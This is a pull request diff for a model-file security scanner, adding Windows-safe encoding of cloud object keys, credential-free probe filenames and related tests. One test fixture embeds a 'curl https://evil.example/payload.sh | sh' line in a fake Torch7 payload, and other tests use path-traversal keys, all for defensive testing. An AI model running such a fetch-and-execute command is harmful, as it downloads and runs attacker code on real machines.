### PR TITLE
fix: restore cross-platform scanner baselines

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Bug Fixes
 
+- use credential-free, cross-platform cloud routing filenames without changing native object-key suffix semantics
+- encode native cloud object keys into collision-resistant, prefix-safe Windows paths and reject out-of-target listings
 - discover extensionless pickle payloads inside ExecuTorch ZIP archives with bounded structural probing, including repeated protocol-0 comment-token evasions
 - report TAR external link escapes with the dedicated symlink rule code, resolve link targets from their correct archive bases, and avoid retaining passing checks for benign link floods
 - bind direct sharded-model cache entries to sibling shard and selected model configuration content fingerprints, and strengthen cache configuration hashes
@@ -50,6 +52,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - preserve executable text-sidecar network findings for f-string calls, standard command wrappers, port-qualified Docker registries, and bounded xargs downloads while keeping prose references informational.
 - stabilize cache identity capture for compressed wrapper scans on Darwin `/private` path aliases and during unrelated temporary-file churn.
 - bound per-tensor and cumulative weight-distribution extraction before materializing PyTorch, HDF5, TensorFlow, and ONNX payloads
+- keep bounded ExecuTorch ZIP snapshots seekable on Python 3.10 so benign and malicious pickle members remain analyzable
 
 ## [0.2.47](https://github.com/promptfoo/modelaudit/compare/v0.2.46...v0.2.47) (2026-06-05)
 

--- a/modelaudit/scanners/executorch_scanner.py
+++ b/modelaudit/scanners/executorch_scanner.py
@@ -1,5 +1,6 @@
 """Scanner for ExecuTorch model files (.pte)."""
 
+import io
 import os
 import pickle
 import pickletools
@@ -841,10 +842,11 @@ class ExecuTorchScanner(BaseScanner):
         opened_stat: os.stat_result,
     ) -> BinaryIO:
         """Copy one stable archive view before parsing attacker-controlled metadata."""
-        snapshot = cast(
-            BinaryIO,
-            tempfile.SpooledTemporaryFile(max_size=_ZIP_SNAPSHOT_MEMORY_LIMIT, mode="w+b"),  # noqa: SIM115
-        )
+        snapshot: BinaryIO
+        if opened_stat.st_size <= _ZIP_SNAPSHOT_MEMORY_LIMIT:
+            snapshot = io.BytesIO()
+        else:
+            snapshot = cast(BinaryIO, tempfile.TemporaryFile(mode="w+b"))  # noqa: SIM115
         try:
             source_handle.seek(0)
             remaining = opened_stat.st_size

--- a/modelaudit/utils/sources/cloud_storage.py
+++ b/modelaudit/utils/sources/cloud_storage.py
@@ -12,7 +12,7 @@ import zipfile
 from collections.abc import Callable, Collection, Coroutine, Iterator, Mapping
 from concurrent.futures import ThreadPoolExecutor
 from datetime import datetime, timedelta
-from pathlib import Path
+from pathlib import Path, PurePosixPath
 from typing import Any, TypeVar
 from urllib.parse import unquote, unquote_plus, urlparse, urlsplit, urlunsplit
 
@@ -117,6 +117,21 @@ _TFLITE_MAGIC_BYTES = b"TFL3"
 _MSGPACK_CONTAINER_MARKERS = frozenset((*range(0x80, 0x90), 0xDE, 0xDF))
 _MAX_CLOUD_METADATA_ERROR_SAMPLES = 3
 _MAX_CLOUD_METADATA_ERROR_DISPLAY_CHARS = 512
+_CLOUD_PROBE_SUFFIX_RE = re.compile(r"\.[0-9A-Za-z][0-9A-Za-z_-]{0,31}\Z")
+_CLOUD_LOCAL_PATH_ESCAPE_CHARS = frozenset('<>:"/\\|?*%#')
+_WINDOWS_RESERVED_LOCAL_PATH_NAMES = frozenset(
+    {"con", "conin$", "conout$", "prn", "aux", "nul"}
+    | {f"com{index}" for index in range(1, 10)}
+    | {f"lpt{index}" for index in range(1, 10)}
+    | {f"com{index}" for index in ("\u00b9", "\u00b2", "\u00b3")}
+    | {f"lpt{index}" for index in ("\u00b9", "\u00b2", "\u00b3")}
+)
+_CLOUD_LOCAL_IDENTITY_HASH_CHARS = 16
+_CLOUD_LOCAL_COMPONENT_MAX_BYTES = 240
+_CLOUD_LOCAL_GENERATED_IDENTITY_RE = re.compile(
+    rf"~[0-9a-f]{{{_CLOUD_LOCAL_IDENTITY_HASH_CHARS}}}(?:\.[0-9A-Za-z][0-9A-Za-z_-]{{0,31}})?\Z",
+    re.IGNORECASE,
+)
 _AWS_REGION_HOST_PART = r"[a-z][a-z0-9]*(?:-[a-z0-9]+)+-\d"
 _AWS_S3_DNS_SUFFIX = (
     r"(?:amazonaws\.com(?:\.cn)?|amazonaws\.eu|c2s\.ic\.gov|sc2s\.sgov\.gov|cloud\.adc-e\.uk|csp\.hci\.ic\.gov)"
@@ -541,6 +556,167 @@ def _cloud_url_basename(url: str) -> str:
     except Exception:
         path = url
     return Path(path).name
+
+
+def _cloud_probe_basename(url: str) -> str:
+    """Return a credential-free, cross-platform filename for content routing."""
+    try:
+        parts = urlsplit(url)
+        basename = parts.path.rsplit("/", 1)[-1]
+        if parts.scheme.casefold() in {"s3", "gs", "gcs", "r2"}:
+            basename = url.rstrip("/").rsplit("/", 1)[-1]
+        suffix = PurePosixPath(basename).suffix
+    except Exception:
+        suffix = ""
+    if not _CLOUD_PROBE_SUFFIX_RE.fullmatch(suffix):
+        suffix = ""
+    return f"cloud-object{suffix}"
+
+
+def _encode_cloud_local_character(character: str) -> str:
+    """Return a reversible ASCII encoding for one local-path character."""
+    return "".join(f"%{byte:02X}" for byte in character.encode("utf-8", errors="surrogatepass"))
+
+
+def _truncate_cloud_local_component(text: str, max_bytes: int) -> str:
+    """Truncate a path component without splitting a UTF-8 code point."""
+    if len(text.encode("utf-8", errors="surrogatepass")) <= max_bytes:
+        return text
+    parts: list[str] = []
+    used_bytes = 0
+    for character in text:
+        character_size = len(character.encode("utf-8", errors="surrogatepass"))
+        if used_bytes + character_size > max_bytes:
+            break
+        parts.append(character)
+        used_bytes += character_size
+    return "".join(parts)
+
+
+def _cloud_local_component_identity(component: str) -> str:
+    """Return the bounded identity used for collision-resistant local paths."""
+    return hashlib.sha256(component.encode("utf-8", errors="surrogatepass")).hexdigest()[
+        :_CLOUD_LOCAL_IDENTITY_HASH_CHARS
+    ]
+
+
+def _cloud_local_reserved_stem(component: str) -> str:
+    """Return the Windows device-name stem after filesystem normalization."""
+    return component.split(".", 1)[0].rstrip(" .").casefold()
+
+
+def _cloud_local_component_is_literal_safe(component: str) -> bool:
+    """Return whether a component can be preserved literally on Windows."""
+    if not component or component != component.rstrip(" ."):
+        return False
+    if any(
+        character in _CLOUD_LOCAL_PATH_ESCAPE_CHARS or ord(character) < 0x20 or 0xD800 <= ord(character) <= 0xDFFF
+        for character in component
+    ):
+        return False
+    return (
+        _cloud_local_reserved_stem(component) not in _WINDOWS_RESERVED_LOCAL_PATH_NAMES
+        and len(component.encode("utf-8", errors="surrogatepass")) <= _CLOUD_LOCAL_COMPONENT_MAX_BYTES
+    )
+
+
+def _cloud_local_path_component(component: str) -> str:
+    """Map one cloud key component to a collision-resistant Windows-safe name."""
+    if not component:
+        return f"~{_cloud_local_component_identity(component)}"
+
+    trailing_start = len(component.rstrip(" ."))
+    encoded_parts: list[str] = []
+    changed = False
+    for index, character in enumerate(component):
+        if (
+            character in _CLOUD_LOCAL_PATH_ESCAPE_CHARS
+            or ord(character) < 0x20
+            or 0xD800 <= ord(character) <= 0xDFFF
+            or index >= trailing_start
+        ):
+            encoded_parts.append(_encode_cloud_local_character(character))
+            changed = True
+        else:
+            encoded_parts.append(character)
+
+    encoded = "".join(encoded_parts)
+    reserved_stem = _cloud_local_reserved_stem(component)
+    if reserved_stem in _WINDOWS_RESERVED_LOCAL_PATH_NAMES:
+        encoded = f"{_encode_cloud_local_character(component[0])}{encoded[1:]}"
+        changed = True
+
+    encoded_size = len(encoded.encode("utf-8", errors="surrogatepass"))
+    needs_case_identity = not component.isascii() or component != component.casefold()
+    uses_generated_identity = _CLOUD_LOCAL_GENERATED_IDENTITY_RE.search(component) is not None
+    if (
+        not changed
+        and not needs_case_identity
+        and not uses_generated_identity
+        and encoded_size <= _CLOUD_LOCAL_COMPONENT_MAX_BYTES
+    ):
+        return component
+
+    # The digest keeps transformed and case-only variants distinct on case-insensitive filesystems.
+    identity = _cloud_local_component_identity(component)
+    suffix = Path(encoded).suffix
+    if not _CLOUD_PROBE_SUFFIX_RE.fullmatch(suffix):
+        suffix = ""
+    stem = encoded[: -len(suffix)] if suffix else encoded
+    identity_suffix = f"~{identity}{suffix}"
+    stem_budget = _CLOUD_LOCAL_COMPONENT_MAX_BYTES - len(identity_suffix.encode("ascii"))
+    bounded_stem = _truncate_cloud_local_component(stem, stem_budget)
+    return f"{bounded_stem}{identity_suffix}"
+
+
+def _cloud_local_leaf_components(component: str) -> tuple[str, ...]:
+    """Preserve scanner-significant basenames while isolating case collisions."""
+    transformed = _cloud_local_path_component(component)
+    if transformed == component or not _cloud_local_component_is_literal_safe(component):
+        return (transformed,)
+    return (f"~{_cloud_local_component_identity(component)}", component)
+
+
+def _cloud_local_directory_component(component: str) -> str:
+    """Map a cloud key directory without colliding with a leaf object."""
+    transformed = _cloud_local_path_component(component)
+    identity_suffix = f"~{_cloud_local_component_identity(component)}"
+    stem_budget = _CLOUD_LOCAL_COMPONENT_MAX_BYTES - len(identity_suffix)
+    return f"{_truncate_cloud_local_component(transformed, stem_budget)}{identity_suffix}"
+
+
+def _cloud_object_relative_path(base_url: str, file_url: str) -> str:
+    """Return a listed object's path relative to the requested cloud target."""
+    normalized_base = _cloud_url_without_query(base_url)
+    normalized_file_url = _cloud_url_without_query(file_url)
+
+    if normalized_file_url.startswith(f"{normalized_base}/"):
+        relative_path = normalized_file_url[len(normalized_base) + 1 :]
+    elif normalized_file_url == normalized_base:
+        relative_path = _cloud_url_basename(file_url)
+    else:
+        file_parts = urlsplit(normalized_file_url)
+        if file_parts.scheme or file_parts.netloc:
+            raise ValueError(f"Cloud object path is outside requested target: {redact_url_for_display(file_url)}")
+        # Provider-relative listing variants should already be normalized; keep a bounded fallback.
+        relative_path = _cloud_url_basename(file_url)
+
+    if not relative_path:
+        raise ValueError(f"Invalid cloud object path: {file_url}")
+    return relative_path
+
+
+def _cloud_object_prefix_conflicts(base_url: str, file_urls: Collection[str]) -> frozenset[str]:
+    """Return object keys that are also directory prefixes of selected objects."""
+    relative_paths = {_cloud_object_relative_path(base_url, file_url) for file_url in file_urls}
+    conflicts: set[str] = set()
+    for relative_path in relative_paths:
+        components = relative_path.split("/")
+        for component_count in range(1, len(components)):
+            prefix = "/".join(components[:component_count])
+            if prefix in relative_paths:
+                conflicts.add(prefix)
+    return frozenset(conflicts)
 
 
 def _remove_path(path: Path) -> None:
@@ -1715,7 +1891,7 @@ def _detect_cloud_shared_skip_filter_route(
         tail_offset = size - tail_size
         tail = _read_cloud_content_range(fs, file_url, tail_offset, tail_size, sniff_budget)
 
-    basename = _cloud_url_basename(file_url) or "cloud-object"
+    basename = _cloud_probe_basename(file_url)
     with tempfile.TemporaryDirectory(prefix="modelaudit_cloud_probe_") as temp_dir:
         probe_path = Path(temp_dir) / Path(basename).name
         with probe_path.open("wb") as handle:
@@ -2045,25 +2221,31 @@ def _filter_scannable_cloud_files(
     return list(scannable_by_path.values())
 
 
-def _build_safe_local_path(base_url: str, file_url: str, download_path: Path) -> Path:
-    """Build a local path for a cloud object and reject traversal attempts."""
-    normalized_base = _cloud_url_without_query(base_url)
-    normalized_file_url = _cloud_url_without_query(file_url)
+def _build_safe_local_path(
+    base_url: str,
+    file_url: str,
+    download_path: Path,
+    *,
+    object_prefix_conflicts: Collection[str] = (),
+) -> Path:
+    """Build a collision-resistant local path for a cloud object."""
+    relative_path = _cloud_object_relative_path(base_url, file_url)
 
-    if normalized_file_url.startswith(f"{normalized_base}/"):
-        relative_path = normalized_file_url[len(normalized_base) + 1 :]
-    elif normalized_file_url == normalized_base:
-        relative_path = _cloud_url_basename(file_url)
-    else:
-        # Fallback to basename for unexpected path shapes.
-        relative_path = _cloud_url_basename(file_url)
-
-    if not relative_path:
-        raise ValueError(f"Invalid cloud object path: {file_url}")
-
-    resolved_path, is_safe = _resolve_cloud_path(relative_path, download_path)
+    remote_components = relative_path.split("/")
+    local_components: list[str] = []
+    remote_prefix_components: list[str] = []
+    for component in remote_components[:-1]:
+        remote_prefix_components.append(component)
+        remote_prefix = "/".join(remote_prefix_components)
+        if remote_prefix in object_prefix_conflicts:
+            local_components.append(_cloud_local_directory_component(component))
+        else:
+            local_components.append(_cloud_local_path_component(component))
+    local_components.extend(_cloud_local_leaf_components(remote_components[-1]))
+    local_relative_path = "/".join(local_components)
+    resolved_path, is_safe = _resolve_cloud_path(local_relative_path, download_path)
     if not is_safe:
-        raise ValueError(f"Path traversal attempt detected in cloud object path: {file_url}")
+        raise ValueError(f"Encoded cloud object path escaped download directory: {file_url}")
 
     local_path = Path(resolved_path)
     if not _is_within_directory(download_path, local_path):
@@ -2397,10 +2579,13 @@ def download_from_cloud(
 
         # Download based on type
         if metadata["type"] == "directory":
+            assert files is not None
+            object_prefix_conflicts = _cloud_object_prefix_conflicts(
+                fs_url,
+                [str(file_info["path"]) for file_info in files],
+            )
             if cache:
                 _clear_directory_contents(download_path)
-
-            assert files is not None
 
             # Download files
             download_budget = _CloudDownloadBudget(max_size) if max_size else None
@@ -2408,7 +2593,12 @@ def download_from_cloud(
                 download_budget.consume(acquired_probe_bytes)
             for file_info in files:
                 file_url = file_info["path"]
-                local_path = _build_safe_local_path(fs_url, file_url, download_path)
+                local_path = _build_safe_local_path(
+                    fs_url,
+                    file_url,
+                    download_path,
+                    object_prefix_conflicts=object_prefix_conflicts,
+                )
                 local_path.parent.mkdir(parents=True, exist_ok=True)
 
                 if show_progress:
@@ -2426,8 +2616,10 @@ def download_from_cloud(
                 download_file()
         else:
             # Single file download
-            file_name = _cloud_url_basename(url)
-            local_file = download_path / file_name
+            remote_file_name = _cloud_url_basename(fs_url)
+            local_file = download_path.joinpath(*_cloud_local_leaf_components(remote_file_name))
+            file_name = local_file.name
+            local_file.parent.mkdir(parents=True, exist_ok=True)
             download_budget = _CloudDownloadBudget(max_size) if max_size else None
             if cache:
                 _remove_path(local_file)
@@ -2563,6 +2755,11 @@ def download_from_cloud_streaming(
             acquired_bytes=acquired_probe_bytes,
         )
 
+    object_prefix_conflicts = _cloud_object_prefix_conflicts(
+        fs_url,
+        [str(file_info["path"]) for file_info in files],
+    )
+
     # Create temp directory for downloads
     temp_dir = Path(tempfile.mkdtemp(prefix="modelaudit_stream_"))
 
@@ -2578,7 +2775,12 @@ def download_from_cloud_streaming(
             is_last = i == total_files - 1
 
             # Build a safe local path relative to the requested cloud base path.
-            local_path = _build_safe_local_path(fs_url, file_url, temp_dir)
+            local_path = _build_safe_local_path(
+                fs_url,
+                file_url,
+                temp_dir,
+                object_prefix_conflicts=object_prefix_conflicts,
+            )
             local_path.parent.mkdir(parents=True, exist_ok=True)
 
             if show_progress:

--- a/tests/scanners/test_executorch_scanner.py
+++ b/tests/scanners/test_executorch_scanner.py
@@ -224,6 +224,9 @@ def test_executorch_scanner_safe_model(tmp_path: Path) -> None:
     result = scanner.scan(str(path))
     assert result.success is True
     assert result.bytes_scanned > 0
+    assert result.metadata["pickle_report_status"] == "complete"
+    assert result.metadata["pickle_verdict"] == "clean"
+    assert "scan_outcome_reasons" not in result.metadata
     critical = [i for i in result.issues if i.severity == IssueSeverity.CRITICAL]
     assert not critical
 
@@ -232,6 +235,10 @@ def test_executorch_scanner_malicious(tmp_path: Path) -> None:
     path = create_executorch_archive(tmp_path, malicious=True)
     scanner = ExecuTorchScanner()
     result = scanner.scan(str(path))
+    assert result.success is True
+    assert result.metadata["pickle_report_status"] == "complete"
+    assert result.metadata["pickle_verdict"] == "malicious"
+    assert "scan_outcome_reasons" not in result.metadata
     assert any(i.severity == IssueSeverity.CRITICAL for i in result.issues)
     assert any("eval" in i.message.lower() for i in result.issues)
 

--- a/tests/test_core.py
+++ b/tests/test_core.py
@@ -3289,7 +3289,11 @@ def test_scan_file_fails_closed_for_renamed_flax_stream_with_scalar_padding_past
 
     assert result.scanner_name == "flax_msgpack"
     assert result.success is False
-    assert any("Msgpack stream object count exceeds configured limit" in issue.message for issue in result.issues)
+    limit_issues = [issue for issue in result.issues if "unvalidated trailing data" in issue.message]
+    assert len(limit_issues) == 1
+    assert limit_issues[0].details["max_msgpack_stream_objects"] == 4096
+    assert limit_issues[0].details["parsed_object_count"] == 4096
+    assert result.metadata["operational_error_reason"] == "msgpack_stream_object_limit_exceeded"
     assert core_module.determine_exit_code(aggregate) == 2
 
 

--- a/tests/test_directory_file_filtering.py
+++ b/tests/test_directory_file_filtering.py
@@ -511,7 +511,10 @@ class TestDirectoryFileFiltering:
         assert results["files_scanned"] == 1
         assert "flax_msgpack" in results.scanner_names
         assert determine_exit_code(results) == 2
-        assert any("Msgpack stream object count exceeds configured limit" in issue.message for issue in results.issues)
+        limit_issues = [issue for issue in results.issues if "unvalidated trailing data" in issue.message]
+        assert len(limit_issues) == 1
+        assert limit_issues[0].details["max_msgpack_stream_objects"] == 4096
+        assert limit_issues[0].details["parsed_object_count"] == 4096
 
     def test_disguised_flax_state_wrapper_with_malicious_attribute_is_scanned(self, tmp_path: Path) -> None:
         msgpack = pytest.importorskip("msgpack")

--- a/tests/utils/sources/test_cloud_storage.py
+++ b/tests/utils/sources/test_cloud_storage.py
@@ -2,6 +2,7 @@ import asyncio
 import io
 import json
 import logging
+import ntpath
 import os
 import stat
 import struct
@@ -20,6 +21,7 @@ from modelaudit.scanner_selection import (
     selected_scanner_extensions,
     selected_scanner_filenames,
 )
+from modelaudit.scanners.manifest_scanner import ManifestScanner
 from modelaudit.utils.file.detection import (
     _XML_MODEL_SIGNATURE_READ_BYTES,
     JAX_JSON_CHECKPOINT_ROUTING_READ_BYTES,
@@ -30,6 +32,8 @@ from modelaudit.utils.sources.cloud_storage import (
     _CLOUD_CONTENT_SNIFF_BYTES,
     GCSCache,
     _build_safe_local_path,
+    _cloud_object_prefix_conflicts,
+    _cloud_probe_basename,
     _CloudContentSniffBudget,
     _filter_scannable_cloud_files,
     _run_coroutine_sync,
@@ -1446,6 +1450,91 @@ def test_filter_scannable_cloud_files_matches_local_skip_filter_routes(
     assert _filter_scannable_cloud_files(files, fs=fs) == [{**files[0], "content_detected_format": expected_format}]
 
 
+def test_filter_scannable_cloud_files_uses_credential_free_probe_name_for_signed_url() -> None:
+    url = "s3://bucket/models/torch7.jpg?X-Amz-Credential=secret&X-Amz-Signature=signature#access_token=fragment-secret"
+    payload = (
+        b"4\n1\n3\nV 1\n13\nnn.Sequential\n"
+        b"4\n2\n3\nV 1\n17\ntorch.FloatTensor\n"
+        b"cmd = os.execute('curl https://evil.example/payload.sh | sh')\n"
+    )
+    fs = make_fs_mock()
+    configure_remote_open_payloads(fs, {url: payload})
+    files = [{"path": url, "name": "torch7.jpg", "size": len(payload), "human_size": f"{len(payload)} B"}]
+    probe_names: list[str] = []
+
+    from modelaudit.utils.file.detection import detect_file_format_for_skip_filter
+
+    def capture_probe_name(path: str) -> str:
+        probe_names.append(Path(path).name)
+        return detect_file_format_for_skip_filter(path)
+
+    with patch(
+        "modelaudit.utils.file.detection.detect_file_format_for_skip_filter",
+        side_effect=capture_probe_name,
+    ):
+        assert _filter_scannable_cloud_files(files, fs=fs) == [{**files[0], "content_detected_format": "torch7"}]
+
+    assert probe_names == ["cloud-object"]
+
+
+@pytest.mark.parametrize(
+    ("url", "expected"),
+    [
+        pytest.param(
+            "s3://bucket/models/hidden.payload?X-Amz-Signature=secret#access_token=fragment-secret",
+            "cloud-object",
+            id="signed-native-url",
+        ),
+        pytest.param(
+            "https://bucket.example/models/hidden.payload?X-Amz-Signature=secret#access_token=fragment-secret",
+            "cloud-object.payload",
+            id="signed-https-url",
+        ),
+        pytest.param(
+            "s3://bucket/models/hidden?token=secret.pkl#fragment-secret",
+            "cloud-object",
+            id="credential-suffix-only-in-query",
+        ),
+        pytest.param(
+            "s3://bucket/models/hidden?literal-key-part.py",
+            "cloud-object.py",
+            id="native-key-suffix-after-delimiter",
+        ),
+        pytest.param(
+            "s3://bucket/models/hidden.payload%3FX-Amz-Signature%3Dsecret",
+            "cloud-object",
+            id="encoded-query-in-path",
+        ),
+    ],
+)
+def test_cloud_probe_basename_excludes_query_and_fragment_material(url: str, expected: str) -> None:
+    basename = _cloud_probe_basename(url)
+
+    assert basename == expected
+    assert not any(character in basename for character in '<>:"/\\|?*')
+    assert "secret" not in basename
+
+
+def test_filter_scannable_cloud_files_preserves_native_key_delimiter_content_route() -> None:
+    url = "s3://bucket/models/hidden.py?literal-object-key-part"
+    payload = make_flax_msgpack_payload()
+    fs = make_fs_mock()
+    configure_remote_open_payloads(fs, {url: payload})
+    files = [{"path": url, "name": "hidden.py?literal-object-key-part", "size": len(payload)}]
+
+    assert _filter_scannable_cloud_files(files, fs=fs) == [{**files[0], "content_detected_format": "flax_msgpack"}]
+
+
+def test_filter_scannable_cloud_files_preserves_native_suffix_after_key_delimiter() -> None:
+    url = "s3://bucket/models/hidden?literal-object-key-part.py"
+    payload = make_flax_msgpack_payload()
+    fs = make_fs_mock()
+    configure_remote_open_payloads(fs, {url: payload})
+    files = [{"path": url, "name": "hidden?literal-object-key-part.py", "size": len(payload)}]
+
+    assert _filter_scannable_cloud_files(files, fs=fs) == []
+
+
 @pytest.mark.parametrize("reported_size", [0, 1])
 def test_filter_scannable_cloud_files_ignores_underreported_size(reported_size: int) -> None:
     url = "s3://bucket/models/model.payload"
@@ -2425,6 +2514,47 @@ def test_download_from_cloud_preserves_normalized_directory_hierarchy(
     fs.get.assert_called_once_with(model_url, str(tmp_path / "nested" / "model.pkl"))
 
 
+@patch("modelaudit.utils.sources.cloud_storage.analyze_cloud_target", new_callable=AsyncMock)
+@patch("fsspec.filesystem")
+def test_download_from_cloud_separates_object_from_same_name_prefix(
+    mock_fs_class: MagicMock,
+    mock_analyze: AsyncMock,
+    tmp_path: Path,
+) -> None:
+    base_url = "s3://bucket/models"
+    leaf_url = f"{base_url}/a.pkl"
+    descendant_url = f"{base_url}/a.pkl/b.pkl"
+    fs = make_fs_mock()
+    fs.get.side_effect = lambda _src, dst: Path(dst).write_bytes(b"data")
+    mock_fs_class.return_value = fs
+    mock_analyze.return_value = {
+        "type": "directory",
+        "file_count": 2,
+        "total_size": 8,
+        "human_size": "8 B",
+        "estimated_time": "instant",
+        "files": [
+            {"path": leaf_url, "name": "a.pkl", "size": 4, "human_size": "4 B"},
+            {"path": descendant_url, "name": "b.pkl", "size": 4, "human_size": "4 B"},
+        ],
+    }
+
+    result = download_from_cloud(
+        base_url,
+        cache_dir=tmp_path,
+        use_cache=False,
+        selective=False,
+        show_progress=False,
+    )
+
+    destinations = {call.args[0]: Path(call.args[1]) for call in fs.get.call_args_list}
+    assert result == tmp_path
+    assert destinations[leaf_url] == tmp_path / "a.pkl"
+    assert destinations[descendant_url].name == "b.pkl"
+    assert destinations[descendant_url].parent.name.startswith("a.pkl~")
+    assert all(path.read_bytes() == b"data" for path in destinations.values())
+
+
 @patch("fsspec.filesystem")
 def test_download_from_cloud_reuses_cache_with_matching_etag(mock_fs: MagicMock, tmp_path: Path) -> None:
     url = "s3://bucket/model.pt"
@@ -2690,7 +2820,37 @@ def test_download_from_cloud_preserves_native_query_text_in_local_path(
     result = download_from_cloud(url, cache_dir=tmp_path, use_cache=False, show_progress=False)
 
     assert isinstance(result, Path)
-    assert result.name == "model?variant.bin"
+    assert result.name.startswith("model%3Fvariant~")
+    assert result.suffix == ".bin"
+    assert not any(character in result.name for character in '<>:"/\\|?*')
+    fs.get.assert_called_once_with(url, str(result))
+
+
+@patch("modelaudit.utils.sources.cloud_storage.analyze_cloud_target", new_callable=AsyncMock)
+@patch("modelaudit.utils.sources.cloud_storage.check_disk_space")
+@patch("fsspec.filesystem")
+def test_download_from_cloud_omits_https_credentials_from_local_path(
+    mock_fs: MagicMock, mock_disk_space: MagicMock, mock_analyze: AsyncMock, tmp_path: Path
+) -> None:
+    url = "https://bucket.s3.amazonaws.com/model.bin?X-Amz-Signature=secret#access_token=fragment-secret"
+    fs = make_fs_mock()
+    fs.info.return_value = {"type": "file", "size": 1024}
+    fs.get.side_effect = lambda _src, dst: Path(dst).write_bytes(b"data")
+    mock_fs.return_value = fs
+    mock_analyze.return_value = {
+        "type": "file",
+        "size": 1024,
+        "name": "model.bin",
+        "human_size": "1.0 KB",
+        "estimated_time": "1 second",
+    }
+    mock_disk_space.return_value = (True, "")
+
+    result = download_from_cloud(url, cache_dir=tmp_path, use_cache=False, show_progress=False)
+
+    assert result == tmp_path / "model.bin"
+    assert "secret" not in str(result)
+    assert "access_token" not in str(result)
     fs.get.assert_called_once_with(url, str(result))
 
 
@@ -2715,9 +2875,15 @@ def test_build_safe_local_path_preserves_literal_object_delimiters(tmp_path: Pat
     question_path = _build_safe_local_path(base_url, f"{base_url}/model?one.pkl", tmp_path)
     fragment_path = _build_safe_local_path(base_url, f"{base_url}/model#two.pkl", tmp_path)
 
-    assert question_path == tmp_path / "model?one.pkl"
-    assert fragment_path == tmp_path / "model#two.pkl"
+    assert question_path.parent == tmp_path
+    assert fragment_path.parent == tmp_path
+    assert question_path.name.startswith("model%3Fone~")
+    assert fragment_path.name.startswith("model%23two~")
+    assert question_path.suffix == ".pkl"
+    assert fragment_path.suffix == ".pkl"
     assert question_path != fragment_path
+    assert not any(character in question_path.name for character in '<>:"/\\|?*')
+    assert not any(character in fragment_path.name for character in '<>:"/\\|?*')
 
 
 def test_build_safe_local_path_preserves_sensitive_looking_native_key_text(tmp_path: Path) -> None:
@@ -2725,9 +2891,216 @@ def test_build_safe_local_path_preserves_sensitive_looking_native_key_text(tmp_p
     first = _build_safe_local_path(base_url, f"{base_url}/model.pkl?X-Amz-Signature=one", tmp_path)
     second = _build_safe_local_path(base_url, f"{base_url}/model.pkl?X-Amz-Signature=two", tmp_path)
 
-    assert first == tmp_path / "model.pkl?X-Amz-Signature=one"
-    assert second == tmp_path / "model.pkl?X-Amz-Signature=two"
+    assert first.name.startswith("model.pkl%3FX-Amz-Signature=one~")
+    assert second.name.startswith("model.pkl%3FX-Amz-Signature=two~")
     assert first != second
+
+
+def test_build_safe_local_path_distinguishes_literal_and_encoded_native_key_text(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    literal = _build_safe_local_path(base_url, f"{base_url}/model?variant.pkl", tmp_path)
+    encoded = _build_safe_local_path(base_url, f"{base_url}/model%3Fvariant.pkl", tmp_path)
+
+    assert "%3F" in literal.name
+    assert "%253F" in encoded.name
+    assert literal != encoded
+
+
+def test_build_safe_local_path_distinguishes_empty_native_key_components(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    ordinary = _build_safe_local_path(base_url, f"{base_url}/a/model.pkl", tmp_path)
+    empty_component = _build_safe_local_path(base_url, f"{base_url}/a//model.pkl", tmp_path)
+
+    assert ordinary == tmp_path / "a" / "model.pkl"
+    assert empty_component != ordinary
+    assert empty_component.name == "model.pkl"
+    assert empty_component.parent.name.startswith("~")
+
+
+def test_build_safe_local_path_encodes_native_colon_component(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    local_path = _build_safe_local_path(base_url, f"{base_url}/x:y/model.pkl", tmp_path)
+
+    assert local_path.name == "model.pkl"
+    assert local_path.parent.name.startswith("x%3Ay~")
+    assert ":" not in str(local_path.relative_to(tmp_path))
+
+
+@pytest.mark.parametrize("key", ["../evil.pkl", r"..\evil.pkl"])
+def test_build_safe_local_path_encodes_traversal_like_object_key_text(tmp_path: Path, key: str) -> None:
+    base_url = "s3://bucket/models"
+
+    local_path = _build_safe_local_path(base_url, f"{base_url}/{key}", tmp_path)
+
+    assert local_path.is_relative_to(tmp_path)
+    assert ".." not in local_path.relative_to(tmp_path).parts
+    assert local_path.name.endswith(".pkl")
+
+
+def test_build_safe_local_path_separates_leaf_from_object_prefix(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+    leaf_url = f"{base_url}/a.pkl"
+    descendant_url = f"{base_url}/a.pkl/b.pkl"
+    conflicts = _cloud_object_prefix_conflicts(base_url, [leaf_url, descendant_url])
+
+    leaf = _build_safe_local_path(base_url, leaf_url, tmp_path, object_prefix_conflicts=conflicts)
+    descendant = _build_safe_local_path(base_url, descendant_url, tmp_path, object_prefix_conflicts=conflicts)
+
+    assert conflicts == frozenset({"a.pkl"})
+    assert leaf == tmp_path / "a.pkl"
+    assert descendant.name == "b.pkl"
+    assert descendant.parent.name.startswith("a.pkl~")
+    assert leaf not in descendant.parents
+
+
+def test_build_safe_local_path_preserves_framework_directory_names_without_leaf_conflicts(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+    file_urls = [
+        f"{base_url}/saved_model.pb",
+        f"{base_url}/assets/payload.py",
+        f"{base_url}/variables/variables.index",
+    ]
+    conflicts = _cloud_object_prefix_conflicts(base_url, file_urls)
+
+    local_paths = [
+        _build_safe_local_path(base_url, file_url, tmp_path, object_prefix_conflicts=conflicts)
+        for file_url in file_urls
+    ]
+
+    assert conflicts == frozenset()
+    assert local_paths == [
+        tmp_path / "saved_model.pb",
+        tmp_path / "assets" / "payload.py",
+        tmp_path / "variables" / "variables.index",
+    ]
+
+
+@pytest.mark.parametrize(
+    "file_url",
+    ["s3://other/private/model.pkl", "s3://bucket/elsewhere/model.pkl"],
+)
+def test_build_safe_local_path_rejects_absolute_object_outside_requested_target(
+    tmp_path: Path,
+    file_url: str,
+) -> None:
+    with pytest.raises(ValueError, match="outside requested target"):
+        _build_safe_local_path("s3://bucket/models", file_url, tmp_path)
+
+
+def test_build_safe_local_path_distinguishes_native_keys_on_case_insensitive_filesystems(tmp_path: Path) -> None:
+    base_url = "s3://bucket/models"
+
+    lower = _build_safe_local_path(base_url, f"{base_url}/model?variant.pkl", tmp_path)
+    upper = _build_safe_local_path(base_url, f"{base_url}/model?Variant.pkl", tmp_path)
+
